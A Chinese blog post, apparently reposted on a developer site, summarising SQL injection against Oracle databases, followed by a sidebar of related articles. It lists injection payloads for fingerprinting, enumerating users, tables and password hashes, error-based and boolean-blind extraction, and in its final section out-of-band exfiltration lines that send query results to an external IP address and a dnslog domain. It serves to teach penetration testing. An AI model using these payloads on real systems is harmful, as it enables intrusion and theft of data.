oracle盲注获取字段,SQL注入小结(Oracle) | 码农网

最新推荐文章于 2024-04-23 09:08:55 发布
最新推荐文章于 2024-04-23 09:08:55 发布
阅读量410 收藏 1
点赞数
文章标签: oracle盲注获取字段

0x00 判断 数据库 类型

Oracle有一些自带的表:dual、user_tables id=45 and (select count(*) from user_tables)>0--

id=45 and (select count(*) from dual)>0--

利用自带的一些函数:譬如utl_http.request 这些

利用 Oracle 的字符连接符:CHR(97)||CHR(110)||CHR(100)||CHR(32)||CHR(49)||CHR(61)||CHR(49)

0x01 基本信息获取

查看sid select instance_name from v$instance;

查看数据库版本: select banner from v$version where rownum=1;

select banner from sys.v_$version where rownum=1;

查看用户: select user from dual; --当前用户

select username from user_users; --当前用户

select username from all_users; --查看所有用户

select username from dba_users; --查看所有用户(需要有权限)

查看当前用户角色: select role from session_roles;

查看数据库用户名和密码: select name, password, astatus from sys.user$; --需要权限

通过注入获取数据 --列database

select global_name from global_name;

select sys.database_name from dual;

select name from v$database;

select instance_name from v$instance;

--列owner

select distinct owner from all_tables;

--列owner的tables

select table_name from all_tables where owner='UTEST';

--列tables的columns

select column_name from all_tab_columns where table_name='TUSER';

select column_name from all_tab_cols where table_name='TUSER';

--列tablespace

select tablespace_name from user_tablespaces;

--列tablespace的tables

select table_name from user_tables where tablespace_name='DB_TEST_DATA';

--列tables的columns

select column_name from user_tab_columns where table_name='TUSER';

0x02 UNION query注入

存在注入

e1aff36653ddd5f1a83507e63a4e0508.png

判断列数

071af0177fbf4a8c3d5513f5718f0583.png

97f425c3540e9aba766ce6d2e964949f.png

尝试union select

6d02229fd35c22a8ee855a1a98544679.png 依次判断字段类型(下图判断出第二个字段是字符型)

7ba7ab1a1150103a0c3d7c7d44518ece.png

84f617ada759c4be2059a3affb4e1f6f.png

得到表名 得到表的个数

bbbf91e9f95d89a7b974b110aa7acf9e.png 得到第一个表的表名

57ababf809edc5f4d3bbca91baa434bd.png 得到第二个表的表名

cacc101c6a6294c2ae6b3addcfb98293.png

得到第一个表的字段

c4cacaeda6a868d5d4948d222f96b8e3.png

得到第一个表的数据

71a4519d908ce3017df3c740b65682cf.png

0x03 error-based注入

ctxsys.drithsx.sn

d724a708af31c534b1838cde125f028b.png

dbms_xdb_version.checkin

a9c32dcd4cb7bbe68e6573b779683793.png

dbms_xdb_version.makeversioned

704d871f1679e90df7d5a5ace8c4dec1.png

dbms_xdb_version.uncheckout

363d36239c8253cc300a9959d93dbd71.png

dbms_utility.sqlid_to_sqlhash

d37d2b3a453a32155ba509a4007e8666.png

utl_inaddr.get_host_name(在11g以后需要是超级用户或已授予网络访问权限的用户才能使用)

dbab312b05e1e0e44385596f9652dca4.png

0x04 boolean-based blind注入

decode

decode(条件,值1,值1结果,值2,值2结果,。。。值n,值n结果,默认值)

条件和那个值相等就返回那个值的结果

d157f4942cee0c540bfb28a758542ea0.png

a60d3ca781b29e8378516d235c3a78b2.png

instr

instr(字符串,子串)

从一个字符串中查找指定子串的位置,这里一直将位置置为1

b61a98177d50d6b178a4c24c4ee79828.png

14d80215b0687786d678841434f784b5.png

0189bbb81edaeafe91a6a630a6e6c74d.png

0x05 无回显注入

web服务接收结果 select * from utest.msg where id=2 and 1=utl_http.request('http://59.108.35.198:8888/'||(select user from dual));

dns服务接收结果 select * from utest.msg where id=2 and (select utl_inaddr.get_host_address((select user from dual)||'.dnslog.wyb0.com') from dual) is not null;

Reference(侵删):

干戈定
关注
出现 nested exception is java.sql.SQLException: 无效的列类型 的解决方法
码农研究僧的博客
06-29 1106
SQL state [99999]; error code [17004]; 无效的列类型; nested exception is java.sql.SQLException: 无效的列类型
oracle 布尔盲注,Oracle基于布尔的盲注总结
weixin_32842805的博客
04-03 1087
0x01 decode函数布尔盲注decode(字段字段的运算,值1,值2,值3)这个函数运行的结果是,当字段字段的运算的值等于值1时,该函数返回值2,否则返回3当然值1,值2,值3也可以是表达式,这个函数使得某些sql语句简单了许多使用方法:比较大小select decode(sign(变量1-变量2),-1,变量1,变量2) from dual; --取较小值sign()函数根据某个值是...
oracle盲注获取字段,Oracle盲注结合XXE漏洞远程获取数据 | CN-SEC 中文
weixin_42351606的博客
04-03 164
摘要想必大家对SQL注入已经耳熟能详,对XML实体注入(简称XXE)也有所了解。本文主要讨论了一种在存在ORACLE盲注的情况下远程获取数据的方式。其实和UTL_HTTP远程获取的方法差不多,只不过原理不同。想必大家对SQL注入已经耳熟能详,对XML实体注入(简称XXE)也有所了解。本文主要讨论了一种在存在ORACLE盲注的情况下远程获取数据的方式。其实和UTL_HTTP远程获取的方法差不多,只不...
oracle盲注获取字段,Oracle基于布尔的盲注总结
weixin_42184237的博客
04-03 216
0x01 decode函数布尔盲注decode(字段字段的运算,值1,值2,值3)这个函数运行的结果是,当字段字段的运算的值等于值1时,该函数返回值2,否则返回3当然值1,值2,值3也可以是表达式,这个函数使得某些sql语句简单了许多使用方法:比较大小select decode(sign(变量1-变量2),-1,变量1,变量2) from dual; --取较小值sign()函数根据某个值是...
oracle 盲注注入,【实战】SQL注入脚本记录
weixin_42400621的博客
04-10 2594
记录最近项目写的几个盲注脚本,方便以后使用1、ORACLE布尔型盲注import urllibimport urllib2import requestspayloads = '_ABCDEFGHIJKLMNOPQRSTUVWXYZ'header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' }values=...
Oracle APEX 搜索数据通过调取Rest API方式
zhengzheng0315的博客
09-15 326
作为初学者,以尝试的方式创建了下面方式通过调用Oracle的Rest API获取数据并用Interactive Grid或者Interactive Report的方式展示。由于返回的数据结构不同,可以根据自己接口返回数据格式进行调整,并将所需字段写入临时创建的Collection中。APEX_collections中的’PROJECTS_COLLECTION’是在process执行的时候创建的,名字与PL/SQL中创建的一致。1. 创建Page,在需要展示区域,创建几个需要的控件和按钮。
Oracle的别名
C语言技术网-码农有道
03-25 3074
文章目录一、生成测试数据二、表和列的别名1、列的别名2、表的别名三、注意事项1、列的别名四、版权声明 在SQL语句中,可以给表和列起别名,这是临时的别名,与同义词不一样,同义词是永久的别名。 别名是多表查询和嵌套查询语句的基础知识,本文只介绍别名的语法,不涉及别名的应用技巧,大家在学习的时候可能觉得别名没什么意义,其实不然。 一、生成测试数据 用以下SQL创建超女基本信息表(T_GIRL),插入一...
C语言连接Oracle数据库
C语言实战技术
03-20 843
文章目录一、源代码说明二、概述三、connection类四、sqlstatement类五、程序流程1、无结果集SQL的程序的流程2、有结果集SQL的程序的流程六、示例程序1、创建超女信息表2、向超女表中插入5条记录3、更新超女表中的记录在这里插入图片描述 4、查询超女表中的记录5、查询超女表中的记录数7、删除超女表中的记录8、执行PL/SQL过程9、CLOB和BLOB字段的操作八、应用经验七、版权...
oracle 布尔盲注,Oracle的SQL盲注
weixin_39550379的博客
04-03 365
Oracle的SQL盲注入[出处未知]盲注入_BlindInject,请参考0x90.org的papers1.详细,from Absinthe@0x90.org2.快速,from google+CROWBARid=1+and+(select+count(*)+from+users)>0id=1+and+(select+count(*)+from+##1##)>0(##1##是从file...
oracle盲注技巧,sql盲注的深入讲解
weixin_34005394的博客
04-15 522
SQL注入大家都知道,很多新人都是从这里入门的,虽然注入语句倒背如流,可是其原理估计很少有人了解。稍微了解一下的也仅仅只是知道SQL注入语句只是一种为了使我们获取信息的一种畸形语句。Ps(很多人不知道SQl注入与SQL盲注的区别,现在我告诉你,没有区别。)首先我先讲讲微软对SQL注入的定义。(1)脚本注入式的攻击(2)恶意用户输入用来影响被执行的 SQL 脚本相信大家都看的懂。另外,我看到...
SQL注入---盲注
zhoutong2323的博客
04-05 831
注是一种SQL注入攻击的形式,在这种攻击中,攻击者向目标应用程序发送恶意注入代码,然后通过观察应用程序的响应来推断出数据库中的信息。与常规的SQL注入攻击不同的是,盲注攻击是页面不会将报错信息回显以及没有明显回显位的情况下,页面不直接返回任何有关数据库的具体错误信息,导致攻击者无法直接获得数据库中的数据。盲注可以分为基于布尔逻辑的盲注和基于时间的盲注两种形式。基于布尔逻辑的盲注:攻击者通过在恶意注入代码中利用布尔逻辑运算符(如AND、OR)来判断条件是否为真,从而推断出数据库中的信息。例如,攻击者可以通过尝
sql注入盲注
最新发布
2302_79119987的博客
04-23 2392
时间盲注又称延迟注入,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。如果页面延迟五秒,说明正确。注入语句与布尔盲注相似,但是过程太繁琐一般使用自动化注入。可以使用脚本进行猜测:(使用时做出修改)# 将url 替换成你的靶场关卡址# 修改两个对应的payload# 目标址(不带参数)# 猜解长度使用的payload# 枚举字符使用的payload(ascii(substr(,{n},1)) ={r})# 获取长度。
络安全 | 2万字总结】SQL盲注?这一篇就够了。
热门推荐
等风来
06-16 1万+
SQL注入(Blind)是一种常见的安全漏洞,它允许攻击者向应用程序的数据库中执行恶意的SQL查询。在传统的SQL注入攻击中,攻击者可以直接获取到应用程序返回的数据库错误信息或查询结果,从而了解到他们所注入的恶意SQL语句是否生效。但在盲注(Blind)注入中,攻击者无法直接获取到这些信息,因此称之为"盲注"。在盲注攻击中,攻击者通过构造恶意的注入语句,将其输入传递给应用程序处理。然后,攻击者观察应用程序的响应或其他可见的行为来确定注入是否成功,并进一步探测和利用数据库中的数据。在本文中,我们深入探讨了。
盲注
vcdy
06-04 1329
http://127.0.0.1/sqli-labs/Less-5?id=1 and 1=1 --+ 正常http://127.0.0.1/sqli-labs/Less-5?id=1 and 1=2 --+ 正常http://127.0.0.1/sqli-labs/Less-5?id=1' and 1=2 --+ 不正常http://127.0.0.1/sqli-labs/Less-5?id=1'...
Oracle基于布尔的盲注总结
weixin_30432579的博客
05-30 440
0x01 decode函数布尔盲注 decode(字段字段的运算,值1,值2,值3) 这个函数运行的结果是,当字段字段的运算的值等于值1时,该函数返回值2,否则返回3 当然值1,值2,值3也可以是表达式,这个函数使得某些sql语句简单了许多使用方法:比较大小 select decode(sign(变量1-变量2),-1,变量1,变量2) from dual; --取较小值 ...
oracle 布尔盲注,Oracle基于延时的盲注总结
weixin_39914975的博客
04-03 390
0x00前言oracle注入中可以通过页面响应的状态,这里指的是响应时间,通过这种方式判断SQL是否被执行的方式,便是时间盲注oracle的时间盲注通常使用DBMS_PIPE.RECEIVE_MESSAGE(),而另外一种便是decode()与高耗时SQL操作的组合,当然也可以是case,if 等方式与高耗时操作的组合,这里的高耗时操作指的是,例如:(select count(*) from ...
Oracle基于延时的盲注总结
mingyqf的博客
04-23 1258
oracle注入中可以通过页面响应的状态,这里指的是响应时间,通过这种方式判断SQL是否被执行的方式,便是时间盲注
Oracle盲注结合XXE漏洞远程获取数据
weixin_34033624的博客
03-08 596
crackershi · 2015/05/12 16:240x00 前言想必大家对SQL注入已经耳熟能详,对XML实体注入(简称XXE)也有所了解。本文主要讨论了一种在存在ORACLE盲注的情况下远程获取数据的方式。其实和UTL_HTTP远程获取的方法差不多,只不过原理不同。0x01 漏洞简析CVE-2014-6577,是Oracle在今年年初修补的XXE漏洞,已知受影响的范围:11.2.0.3,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值